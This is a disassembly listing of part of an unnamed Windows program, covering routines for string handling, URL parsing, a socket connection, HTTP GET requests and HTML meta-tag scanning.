loc_41957B: ; CODE XREF: sub_419565+D�j
mov eax, esi
pop esi
retn 4
sub_419565 endp
; =============== S U B R O U T I N E =======================================
sub_419581 proc near ; CODE XREF: sub_419797+25�p
; sub_41984D+30�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
and dword ptr [esi+4], 0
and dword ptr [esi+0Ch], 0
mov dword ptr [esi], offset off_437334
call sub_4195FC
and dword ptr [esi+8], 0
mov eax, esi
pop esi
retn 4
sub_419581 endp
; =============== S U B R O U T I N E =======================================
sub_4195A5 proc near ; CODE XREF: sub_419797+72�p
; sub_419A4B+11E�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
and dword ptr [esi+4], 0
and dword ptr [esi+0Ch], 0
mov dword ptr [esi], offset off_437334
call sub_419649
and dword ptr [esi+8], 0
mov eax, esi
pop esi
retn 4
sub_4195A5 endp
; =============== S U B R O U T I N E =======================================
sub_4195C9 proc near ; CODE XREF: sub_419565+3�p
; sub_419797+7A�p ...
push esi
mov esi, ecx
mov eax, [esi+4]
mov dword ptr [esi], offset off_437334
test eax, eax
jz short loc_4195E0
push eax
call sub_429822
pop ecx
loc_4195E0: ; CODE XREF: sub_4195C9+E�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
test eax, eax
jz short loc_4195F2
push eax
call sub_429822
pop ecx
loc_4195F2: ; CODE XREF: sub_4195C9+20�j
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn
sub_4195C9 endp
; =============== S U B R O U T I N E =======================================
sub_4195FC proc near ; CODE XREF: sub_419581+15�p
; sub_419649+F�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov eax, [esi+4]
test eax, eax
jz short loc_41960D
push eax
call sub_429822
pop ecx
loc_41960D: ; CODE XREF: sub_4195FC+8�j
push [esp+4+arg_0]
call sub_4292D0
mov [esi+0Ch], eax
add eax, 2
push eax
call sub_4296E8
mov ecx, [esi+0Ch]
mov [esi+4], eax
inc ecx
inc ecx
push ecx
push 0
push eax
call sub_429690
push dword ptr [esi+0Ch]
push [esp+1Ch+arg_0]
push dword ptr [esi+4]
call sub_429C40
add esp, 20h
pop esi
retn 4
sub_4195FC endp
; =============== S U B R O U T I N E =======================================
sub_419649 proc near ; CODE XREF: sub_4195A5+15�p
; sub_4199B7�j ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov ecx, [esp+4+arg_0]
call sub_4199C6
push eax
mov ecx, esi
call sub_4195FC
pop esi
retn 4
sub_419649 endp
; =============== S U B R O U T I N E =======================================
sub_419661 proc near ; CODE XREF: sub_4196AA+F�p
; sub_419A4B+A9�p ...
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
mov esi, ecx
call sub_4292D0
add [esi+0Ch], eax
mov eax, [esi+0Ch]
inc eax
push eax
call sub_4296E8
pop ecx
mov edi, eax
pop ecx
push dword ptr [esi+4]
push edi
call dword_4370A4 ; lstrcpyA
push [esp+8+arg_0]
push edi
call dword_437090 ; lstrcatA
mov eax, [esi+4]
test eax, eax
jz short loc_4196A2
push eax
call sub_429822
pop ecx
loc_4196A2: ; CODE XREF: sub_419661+38�j
mov [esi+4], edi
pop edi
pop esi
retn 4
sub_419661 endp
; =============== S U B R O U T I N E =======================================
sub_4196AA proc near ; CODE XREF: sub_419B88+414�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov ecx, [esp+4+arg_0]
call sub_4199C6
push eax
mov ecx, esi
call sub_419661
pop esi
retn 4
sub_4196AA endp
; =============== S U B R O U T I N E =======================================
sub_4196C2 proc near ; CODE XREF: sub_419B88+69�p
; sub_419B88+79�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push dword ptr [ecx+4]
call dword_437174 ; lstrcmpiA
retn 4
sub_4196C2 endp
; =============== S U B R O U T I N E =======================================
sub_4196D2 proc near ; CODE XREF: .text:0041A232�p
; .text:0041A3E0�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push dword ptr [ecx+4]
call sub_42A7F0
pop ecx
pop ecx
retn 4
sub_4196D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196E3 proc near ; CODE XREF: .text:0041A116�p
; .text:0041A135�p ...
var_2000 = byte ptr -2000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 2000h
call sub_429A90
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_2000]
push [ebp+arg_4]
push 2000h
push eax
call sub_42B7DA
mov ecx, [ebp+arg_0]
add esp, 10h
lea eax, [ebp+var_2000]
push eax
call sub_4195FC
leave
retn
sub_4196E3 endp
; =============== S U B R O U T I N E =======================================
sub_41971C proc near ; CODE XREF: sub_419B88+A2�p
; .text:0041A1AC�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_41972A
retn 4
sub_41971C endp
; =============== S U B R O U T I N E =======================================
sub_41972A proc near ; CODE XREF: sub_41971C+6�p
arg_0 = byte ptr 4
push esi
push edi
movsx edi, [esp+8+arg_0]
mov esi, ecx
push edi
push dword ptr [esi+4]
call sub_42B0D0
pop ecx
test eax, eax
pop ecx
jz short loc_419755
push edi
push dword ptr [esi+4]
call sub_42B0D0
pop ecx
pop ecx
xor ecx, ecx
inc ecx
sub ecx, [esi+4]
add eax, ecx
loc_419755: ; CODE XREF: sub_41972A+16�j
pop edi
pop esi
retn 8
sub_41972A endp
; =============== S U B R O U T I N E =======================================
sub_41975A proc near ; CODE XREF: sub_419B88+38F�p
; sub_419B88+3A9�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_419768
retn 4
sub_41975A endp
; =============== S U B R O U T I N E =======================================
sub_419768 proc near ; CODE XREF: sub_41975A+6�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
push dword ptr [esi+4]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_419793
push [esp+4+arg_0]
push dword ptr [esi+4]
call sub_42ADD0
pop ecx
pop ecx
xor ecx, ecx
inc ecx
sub ecx, [esi+4]
add eax, ecx
loc_419793: ; CODE XREF: sub_419768+13�j
pop esi
retn 8
sub_419768 endp
; =============== S U B R O U T I N E =======================================
sub_419797 proc near ; CODE XREF: sub_41982A+17�p
; .text:0041A209�p ...
mov eax, offset loc_436254
call sub_42B6FC
sub esp, 18h
and dword ptr [ebp-14h], 0
push edi
mov edi, [ebp+10h]
mov [ebp-10h], ecx
cmp edi, 1
jge short loc_4197C3
mov ecx, [ebp+8]
push offset byte_454A34
call sub_419581
jmp short loc_419818
; ---------------------------------------------------------------------------
loc_4197C3: ; CODE XREF: sub_419797+1B�j
push ebx
push esi
lea ecx, [ebp-24h]
call sub_419551
and dword ptr [ebp-4], 0
lea esi, [edi+1]
push esi
call sub_4296E8
mov ebx, eax
push esi
push 0
push ebx
call sub_429690
mov eax, [ebp-10h]
push edi
mov eax, [eax+4]
add eax, [ebp+0Ch]
push eax
push ebx
call sub_429350
add esp, 1Ch
lea ecx, [ebp-24h]
push ebx
call sub_4195FC
mov ecx, [ebp+8]
lea eax, [ebp-24h]
push eax
call sub_4195A5
lea ecx, [ebp-24h]
call sub_4195C9
pop esi
pop ebx
loc_419818: ; CODE XREF: sub_419797+2A�j
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
mov large fs:0, ecx
leave
retn 0Ch
sub_419797 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41982A proc near ; CODE XREF: sub_419B88+39C�p
; sub_419B88+3B6�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
call sub_41DA96
sub eax, [ebp+arg_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419797
mov eax, [ebp+arg_0]
leave
retn 8
sub_41982A endp
; =============== S U B R O U T I N E =======================================
sub_41984D proc near ; CODE XREF: sub_419998+13�p
; .text:0041A4D6�p ...
mov eax, offset loc_436287
call sub_42B6FC
sub esp, 28h
push ebx
xor ebx, ebx
mov [ebp-14h], ebx
mov al, [ebp+0Bh]
push esi
push edi
mov [ebp-24h], al
mov [ebp-20h], ebx
mov [ebp-1Ch], ebx
mov [ebp-18h], ebx
push dword ptr [ecx+4]
xor esi, esi
inc esi
lea ecx, [ebp-34h]
mov [ebp-4], esi
call sub_419581
lea ecx, [ebp-34h]
mov byte ptr [ebp-4], 2
call sub_4199C6
mov [ebp-10h], eax
mov cl, [eax]
cmp cl, bl
jz loc_419934
mov edi, [ebp+10h]
loc_41989E: ; CODE XREF: sub_41984D+E1�j
mov dl, [edi]
cmp cl, dl
jnz short loc_4198AC
loc_4198A4: ; CODE XREF: sub_41984D+5D�j
inc eax
mov [ebp-10h], eax
cmp [eax], dl
jz short loc_4198A4
loc_4198AC: ; CODE XREF: sub_41984D+55�j
cmp byte ptr [eax], 22h
setz byte ptr [ebp+13h]
cmp [ebp+13h], bl
jz short loc_4198BC
inc eax
mov [ebp-10h], eax
loc_4198BC: ; CODE XREF: sub_41984D+69�j
lea eax, [ebp-10h]
lea ecx, [ebp-24h]
push eax
call sub_41B11E
mov eax, [ebp-10h]
cmp [ebp+13h], bl
mov cl, [eax]
jz short loc_419903
cmp cl, bl
jz short loc_419934
loc_4198D6: ; CODE XREF: sub_41984D+A2�j
cmp cl, 22h
jnz short loc_4198E7
mov cl, [eax+1]
cmp cl, 20h
jz short loc_4198F1
cmp cl, bl
jz short loc_4198F1
loc_4198E7: ; CODE XREF: sub_41984D+8C�j
inc eax
mov [ebp-10h], eax
mov cl, [eax]
cmp cl, bl
jnz short loc_4198D6
loc_4198F1: ; CODE XREF: sub_41984D+94�j
; sub_41984D+98�j
cmp [eax], bl
jz short loc_419934
mov [eax], bl
mov eax, [ebp-10h]
cmp [eax+1], bl
jz short loc_41992A
inc eax
inc eax
jmp short loc_419927
; ---------------------------------------------------------------------------
loc_419903: ; CODE XREF: sub_41984D+83�j
cmp cl, bl
jz short loc_419934
mov dl, [edi]
loc_419909: ; CODE XREF: sub_41984D+C8�j
cmp cl, dl
jz short loc_419917
inc eax
mov [ebp-10h], eax
mov cl, [eax]
cmp cl, bl
jnz short loc_419909
loc_419917: ; CODE XREF: sub_41984D+BE�j
mov cl, [eax]
cmp cl, bl
jz short loc_419934
cmp cl, dl
jnz short loc_41992A
mov [eax], bl
mov eax, [ebp-10h]
inc eax
loc_419927: ; CODE XREF: sub_41984D+B4�j
mov [ebp-10h], eax
loc_41992A: ; CODE XREF: sub_41984D+B0�j
; sub_41984D+D2�j
mov cl, [eax]
cmp cl, bl
jnz loc_41989E
loc_419934: ; CODE XREF: sub_41984D+48�j
; sub_41984D+87�j ...
cmp [ebp-20h], ebx
jz short loc_419947
mov eax, [ebp-1Ch]
sub eax, [ebp-20h]
sar eax, 2
cmp [ebp+0Ch], eax
jb short loc_419959
loc_419947: ; CODE XREF: sub_41984D+EA�j
mov ecx, [ebp+8]
push offset byte_454A34
call sub_419581
mov [ebp-14h], esi
jmp short loc_419971
; ---------------------------------------------------------------------------
loc_419959: ; CODE XREF: sub_41984D+F8�j
push dword ptr [ebp+0Ch]
lea ecx, [ebp-24h]
call sub_41B0F1
push dword ptr [eax]
mov ecx, [ebp+8]
call sub_419581
mov [ebp-14h], esi
loc_419971: ; CODE XREF: sub_41984D+10A�j
lea ecx, [ebp-34h]
call sub_4195C9
lea ecx, [ebp-24h]
mov [ebp-4], bl
call sub_41B0D8
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 10h
sub_41984D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419998 proc near ; CODE XREF: sub_419B88+42�p
; sub_419B88+95�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
and [ebp+var_4], 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41984D
mov eax, [ebp+arg_0]
leave
retn 0Ch
sub_419998 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4199B7 proc near ; CODE XREF: sub_419B88+3C3�p
; sub_419B88+3F2�p ...
jmp sub_419649
sub_4199B7 endp
; =============== S U B R O U T I N E =======================================
sub_4199BC proc near ; CODE XREF: .text:0041A4FC�p
; .text:0041A89F�p ...
arg_0 = dword ptr 4
mov eax, [ecx+4]
add eax, [esp+arg_0]
retn 4
sub_4199BC endp
; =============== S U B R O U T I N E =======================================
sub_4199C6 proc near ; CODE XREF: sub_419649+7�p
; sub_4196AA+7�p ...
mov eax, [ecx+4]
retn
sub_4199C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4199CA proc near ; CODE XREF: sub_419A4B+29�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push esi
push eax
push 101h
call dword_4372B4 ; WSAStartup
push 6
push 1
push 2
call dword_4372B8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_419A41
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_429690
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call dword_4372C0 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_41E326
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_4372C8 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_419A46
push esi
call dword_4372D4 ; closesocket
loc_419A41: ; CODE XREF: sub_4199CA+2D�j
or eax, 0FFFFFFFFh
jmp short loc_419A48
; ---------------------------------------------------------------------------
loc_419A46: ; CODE XREF: sub_4199CA+6E�j
mov eax, esi
loc_419A48: ; CODE XREF: sub_4199CA+7A�j
pop esi
leave
retn
sub_4199CA endp
; =============== S U B R O U T I N E =======================================
sub_419A4B proc near ; CODE XREF: .text:0041A184�p
; .text:0041A3AF�p ...
mov eax, offset loc_43629C
call sub_42B6FC
mov eax, 1014h
call sub_429A90
mov eax, [ebp+10h]
push esi
xor esi, esi
push dword ptr [eax+40h]
lea ecx, [eax+10h]
mov [ebp-20h], esi
call sub_4199C6
push eax
call sub_4199CA
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+10h], eax
jnz short loc_419A95
mov ecx, [ebp+8]
push offset byte_454A34
call sub_419581
jmp loc_419B78
; ---------------------------------------------------------------------------
loc_419A95: ; CODE XREF: sub_419A4B+36�j
push ebx
push edi
push esi
push dword ptr [ebp+0Ch]
call sub_4292D0
pop ecx
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+10h]
call dword_4372CC ; send
push offset byte_454A34
lea ecx, [ebp-1Ch]
call sub_419581
mov edi, dword_4372D0
mov [ebp-4], esi
mov esi, 1000h
loc_419AC9: ; CODE XREF: sub_419A4B+B4�j
; sub_419A4B+DC�j
push 0
lea eax, [ebp-1020h]
push esi
push eax
push dword ptr [ebp+10h]
call edi ; dword_4372D0
mov ebx, eax
test ebx, ebx
jle short loc_419B29
cmp ebx, esi
jge short loc_419AEA
and byte ptr [ebp+ebx-1020h], 0
loc_419AEA: ; CODE XREF: sub_419A4B+95�j
lea eax, [ebp-1020h]
lea ecx, [ebp-1Ch]
push eax
call sub_419661
and dword ptr [ebp+0Ch], 0
test ebx, ebx
jle short loc_419AC9
loc_419B01: ; CODE XREF: sub_419A4B+DA�j
mov eax, [ebp+0Ch]
push 4
push offset asc_446DCC ; "\r\n\r\n"
lea eax, [ebp+eax-1020h]
push eax
call sub_42B870
add esp, 0Ch
test eax, eax
jz short loc_419B29
inc dword ptr [ebp+0Ch]
cmp [ebp+0Ch], ebx
jl short loc_419B01
jmp short loc_419AC9
; ---------------------------------------------------------------------------
loc_419B29: ; CODE XREF: sub_419A4B+91�j
; sub_419A4B+D2�j ...
push 0
lea eax, [ebp-1020h]
push esi
push eax
push dword ptr [ebp+10h]
call edi ; dword_4372D0
test eax, eax
jle short loc_419B59
cmp eax, esi
jge short loc_419B48
and byte ptr [ebp+eax-1020h], 0
loc_419B48: ; CODE XREF: sub_419A4B+F3�j
lea eax, [ebp-1020h]
lea ecx, [ebp-1Ch]
push eax
call sub_419661
jmp short loc_419B29
; ---------------------------------------------------------------------------
loc_419B59: ; CODE XREF: sub_419A4B+EF�j
push dword ptr [ebp+10h]
call dword_4372D4 ; closesocket
mov ecx, [ebp+8]
lea eax, [ebp-1Ch]
push eax
call sub_4195A5
lea ecx, [ebp-1Ch]
call sub_4195C9
pop edi
pop ebx
loc_419B78: ; CODE XREF: sub_419A4B+45�j
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop esi
mov large fs:0, ecx
leave
retn
sub_419A4B endp
; =============== S U B R O U T I N E =======================================
sub_419B88 proc near ; CODE XREF: .text:0041A02A�p
; .text:0041A31D�p ...
mov eax, offset loc_436348
call sub_42B6FC
sub esp, 50h
push esi
xor esi, esi
cmp [ebp+8], esi
jnz short loc_419BA4
xor eax, eax
jmp loc_419FB8
; ---------------------------------------------------------------------------
loc_419BA4: ; CODE XREF: sub_419B88+13�j
push ebx
push edi
lea ecx, [ebp-1Ch]
call sub_419551
push dword ptr [ebp+8]
lea ecx, [ebp-1Ch]
mov [ebp-4], esi
call sub_4195FC
mov ebx, offset asc_446DE8 ; ":"
lea eax, [ebp-3Ch]
push ebx
push esi
push eax
lea ecx, [ebp-1Ch]
call sub_419998
mov edi, [ebp+0Ch]
push eax
mov ecx, edi
mov byte ptr [ebp-4], 1
call sub_419649
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_4195C9
push offset aHttp ; "http"
mov ecx, edi
call sub_4196C2
test eax, eax
jz short loc_419C0E
push offset aFtp ; "ftp"
mov ecx, edi
call sub_4196C2
test eax, eax
jnz loc_419FAC
loc_419C0E: ; CODE XREF: sub_419B88+70�j
mov esi, offset asc_446DD8 ; "/"
lea eax, [ebp-3Ch]
push esi
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_419998
push 40h
mov ecx, eax
mov byte ptr [ebp-4], 2
call sub_41971C
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
mov [ebp+8], eax
call sub_4195C9
cmp dword ptr [ebp+8], 0
push esi
lea ecx, [ebp-1Ch]
push 1
jz loc_419E48
lea eax, [ebp-5Ch]
push eax
call sub_419998
push offset a@_6 ; "@"
lea ecx, [ebp-4Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 3
call sub_419998
push ebx
lea ecx, [ebp-3Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 4
call sub_419998
lea ecx, [edi+10h]
push eax
mov byte ptr [ebp-4], 5
call sub_419649
lea ecx, [ebp-3Ch]
call sub_4195C9
lea ecx, [ebp-4Ch]
call sub_4195C9
and byte ptr [ebp-4], 0
lea ecx, [ebp-5Ch]
call sub_4195C9
push offset byte_454A34
lea ecx, [edi+10h]
call sub_4196C2
test eax, eax
jnz short loc_419CC0
loc_419CB9: ; CODE XREF: sub_419B88+23F�j
; sub_419B88+2BB�j ...
xor esi, esi
jmp loc_419FAC
; ---------------------------------------------------------------------------
loc_419CC0: ; CODE XREF: sub_419B88+12F�j
push esi
lea eax, [ebp-3Ch]
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_419998
push offset a@_6 ; "@"
lea ecx, [ebp-4Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 6
call sub_419998
push ebx
lea ecx, [ebp-5Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 7
call sub_419998
mov ecx, eax
call sub_4199C6
push eax
call sub_42A030
pop ecx
mov [edi+40h], eax
lea ecx, [ebp-5Ch]
call sub_4195C9
lea ecx, [ebp-4Ch]
call sub_4195C9
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_4195C9
cmp dword ptr [edi+40h], 0
jnz short loc_419D58
push offset aHttp ; "http"
mov ecx, edi
call sub_4196C2
test eax, eax
jnz short loc_419D41
mov dword ptr [edi+40h], 50h
loc_419D41: ; CODE XREF: sub_419B88+1B0�j
push offset aFtp ; "ftp"
mov ecx, edi
call sub_4196C2
test eax, eax
jnz short loc_419D58
mov dword ptr [edi+40h], 15h
loc_419D58: ; CODE XREF: sub_419B88+1A0�j
; sub_419B88+1C7�j
push esi
lea eax, [ebp-3Ch]
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_419998
push offset a@_6 ; "@"
lea ecx, [ebp-4Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 8
call sub_419998
push ebx
lea ecx, [ebp-5Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 9
call sub_419998
lea ecx, [edi+20h]
push eax
mov byte ptr [ebp-4], 0Ah
call sub_419649
lea ecx, [ebp-5Ch]
call sub_4195C9
lea ecx, [ebp-4Ch]
call sub_4195C9
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_4195C9
push offset byte_454A34
lea ecx, [edi+20h]
call sub_4196C2
test eax, eax
jz loc_419CB9
push esi
lea eax, [ebp-3Ch]
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_419998
push offset a@_6 ; "@"
lea ecx, [ebp-4Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Bh
call sub_419998
push ebx
lea ecx, [ebp-5Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Ch
call sub_419998
lea ebx, [edi+30h]
push eax
mov ecx, ebx
mov byte ptr [ebp-4], 0Dh
call sub_419649
lea ecx, [ebp-5Ch]
call sub_4195C9
lea ecx, [ebp-4Ch]
call sub_4195C9
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_4195C9
push offset byte_454A34
mov ecx, ebx
call sub_4196C2
test eax, eax
jnz loc_419F13
jmp loc_419CB9
; ---------------------------------------------------------------------------
loc_419E48: ; CODE XREF: sub_419B88+C0�j
lea eax, [ebp-4Ch]
push eax
call sub_419998
push ebx
lea ecx, [ebp-5Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Eh
call sub_419998
lea ecx, [edi+10h]
push eax
mov byte ptr [ebp-4], 0Fh
call sub_419649
lea ecx, [ebp-5Ch]
call sub_4195C9
and byte ptr [ebp-4], 0
lea ecx, [ebp-4Ch]
call sub_4195C9
push offset byte_454A34
lea ecx, [edi+10h]
call sub_4196C2
test eax, eax
jz loc_419CB9
push esi
lea eax, [ebp-4Ch]
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_419998
push ebx
lea ecx, [ebp-5Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 10h
call sub_419998
mov ecx, eax
call sub_4199C6
push eax
call sub_42A030
pop ecx
mov [edi+40h], eax
lea ecx, [ebp-5Ch]
call sub_4195C9
and byte ptr [ebp-4], 0
lea ecx, [ebp-4Ch]
call sub_4195C9
cmp dword ptr [edi+40h], 0
jnz short loc_419F13
push offset aHttp ; "http"
mov ecx, edi
call sub_4196C2
test eax, eax
jnz short loc_419EFC
mov dword ptr [edi+40h], 50h
loc_419EFC: ; CODE XREF: sub_419B88+36B�j
push offset aFtp ; "ftp"
mov ecx, edi
call sub_4196C2
test eax, eax
jnz short loc_419F13
mov dword ptr [edi+40h], 15h
loc_419F13: ; CODE XREF: sub_419B88+2B5�j
; sub_419B88+35B�j ...
push esi
lea ecx, [ebp-1Ch]
call sub_41975A
push eax
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-1Ch]
call sub_41982A
push esi
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 11h
call sub_41975A
push eax
lea eax, [ebp-5Ch]
push eax
lea ecx, [ebp-2Ch]
call sub_41982A
push eax
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 12h
call sub_4199B7
lea ecx, [ebp-5Ch]
mov byte ptr [ebp-4], 11h
call sub_4195C9
push esi
lea ecx, [ebp-2Ch]
call sub_41975A
push eax
lea eax, [ebp-5Ch]
push eax
lea ecx, [ebp-2Ch]
call sub_41982A
push eax
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 13h
call sub_4199B7
lea ecx, [ebp-5Ch]
mov byte ptr [ebp-4], 11h
call sub_4195C9
add edi, 44h
push esi
mov ecx, edi
call sub_4195FC
lea eax, [ebp-2Ch]
mov ecx, edi
push eax
call sub_4196AA
lea ecx, [ebp-2Ch]
call sub_4195C9
xor esi, esi
inc esi
loc_419FAC: ; CODE XREF: sub_419B88+80�j
; sub_419B88+133�j
lea ecx, [ebp-1Ch]
call sub_4195C9
pop edi
mov eax, esi
pop ebx
loc_419FB8: ; CODE XREF: sub_419B88+17�j
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_419B88 endp
; ---------------------------------------------------------------------------
loc_419FC5: ; DATA XREF: sub_40A938+8094�o
mov eax, offset loc_436500
call sub_42B6FC
sub esp, 0C40h
mov eax, [ebp+8]
push ebx
push esi
push edi
mov ecx, 22Ah
mov esi, eax
lea edi, [ebp-0C4Ch]
xor ebx, ebx
rep movsd
mov dword ptr [eax+8A4h], 1
mov eax, [ebp-0C4Ch]
lea ecx, [ebp-1F4h]
mov [ebp-34h], eax
mov [ebp-48h], ebx
call sub_41B083
mov [ebp-4], ebx
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
lea eax, [ebp-1F4h]
push eax
lea eax, [ebp-0C48h]
push eax
call sub_419B88
add esp, 0Ch
test eax, eax
jnz short loc_41A09B
cmp [ebp-3ACh], ebx
mov esi, offset aFailedToParse_ ; "Failed to parse."
jnz short loc_41A05E
cmp [ebp-3B0h], ebx
jnz short loc_41A066
lea eax, [ebp-448h]
push esi
push eax
push dword ptr [ebp-34h]
call sub_41CD84
add esp, 0Ch
loc_41A05E: ; CODE XREF: .text:0041A041�j
cmp [ebp-3B0h], ebx
jz short loc_41A079
loc_41A066: ; CODE XREF: .text:0041A049�j
lea eax, [ebp-448h]
push esi
push eax
push dword ptr [ebp-34h]
call sub_41CD0E
add esp, 0Ch
loc_41A079: ; CODE XREF: .text:0041A064�j
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-1F4h]
call sub_41B0AD
mov ecx, [ebp-0Ch]
pop edi
pop esi
xor eax, eax
pop ebx
mov large fs:0, ecx
leave
retn 4
; ---------------------------------------------------------------------------
loc_41A09B: ; CODE XREF: .text:0041A034�j
xor eax, eax
cmp off_446338, ebx
jz short loc_41A0AF
loc_41A0A5: ; CODE XREF: .text:0041A0AD�j
inc eax
cmp off_446338[eax*4], ebx
jnz short loc_41A0A5
loc_41A0AF: ; CODE XREF: .text:0041A0A3�j
dec eax
cmp [ebp-3C0h], ebx
mov [ebp-0D0h], eax
jle loc_41B002
mov esi, offset asc_43D938 ; " "
mov edi, offset asc_44734C ; "="
loc_41A0CC: ; CODE XREF: .text:0041AFFC�j
push dword ptr [ebp-0D0h]
push ebx
call sub_41E34F
mov eax, off_446338[eax*4]
pop ecx
pop ecx
mov [ebp+8], eax
lea ecx, [ebp-30h]
call sub_419551
lea ecx, [ebp-20h]
call sub_419551
cmp dword ptr [ebp-3C4h], 50h
mov byte ptr [ebp-4], 2
lea ecx, [ebp-1E4h]
jnz short loc_41A120
call sub_4199C6
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_4196E3
add esp, 0Ch
jmp short loc_41A13D
; ---------------------------------------------------------------------------
loc_41A120: ; CODE XREF: .text:0041A105�j
push dword ptr [ebp-1B4h]
call sub_4199C6
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_4196E3
add esp, 10h
loc_41A13D: ; CODE XREF: .text:0041A11E�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_4199C6
push eax
lea ecx, [ebp-1B0h]
push dword ptr [ebp+8]
call sub_4199C6
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_4196E3
add esp, 18h
lea eax, [ebp-1F4h]
lea ecx, [ebp-30h]
push eax
call sub_4199C6
push eax
lea eax, [ebp-0CCh]
push eax
call sub_419A4B
add esp, 0Ch
mov byte ptr [ebp-4], 3
jmp loc_41AF93
; ---------------------------------------------------------------------------
loc_41A195: ; CODE XREF: .text:0041AF99�j
lea ecx, [ebp-0ACh]
call sub_41B083
push 3Ch
lea ecx, [ebp-0CCh]
mov byte ptr [ebp-4], 4
call sub_41971C
test eax, eax
jz loc_41AFA1
push 3Ch
lea ecx, [ebp-0CCh]
call sub_41971C
push eax
lea eax, [ebp-0F0h]
push eax
lea ecx, [ebp-0CCh]
call sub_41982A
lea eax, [ebp-0F0h]
lea ecx, [ebp-0CCh]
push eax
mov byte ptr [ebp-4], 5
call sub_4199B7
push 3Eh
lea ecx, [ebp-0CCh]
call sub_41971C
dec eax
lea ecx, [ebp-0CCh]
push eax
lea eax, [ebp-44h]
push ebx
push eax
call sub_419797
push esi
lea eax, [ebp-0BCh]
push ebx
push eax
lea ecx, [ebp-44h]
mov byte ptr [ebp-4], 6
call sub_419998
push offset aMeta ; "meta"
lea ecx, [ebp-0BCh]
mov byte ptr [ebp-4], 7
call sub_4196D2
test eax, eax
